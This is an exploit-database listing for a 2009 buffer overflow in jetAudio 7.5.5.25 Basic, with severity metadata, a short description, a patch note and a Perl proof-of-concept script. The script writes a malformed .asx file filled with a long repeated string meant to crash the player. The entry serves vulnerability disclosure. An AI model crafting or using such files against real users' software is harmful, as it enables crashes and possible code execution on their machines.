header-logo
Suggest Exploit
vendor:
jetAudio
by:
D3V!L FUCKER
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: jetAudio
Affected Version From: 7.5.5.25 Basic
Affected Version To: 7.5.5.25 Basic
Patch Exists: YES
Related CWE: N/A
CPE: jetaudio
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista SP0
2009

jetAudio v 7.5.5.25 Basic Buffer Overflow

This exploit is a buffer overflow vulnerability in jetAudio v 7.5.5.25 Basic. The vulnerability is triggered when a maliciously crafted .asx file is opened, causing a buffer overflow. This can lead to arbitrary code execution.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

#!/user/bin/perl
# Author: [D3V!L FUCKER]
# Version: [jetAudio v 7.5.5.25 Basic]
# Tested on: [windows vista sp0]
# Code :
my $file= "crash.asx";

my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

print "Done..!~#\n";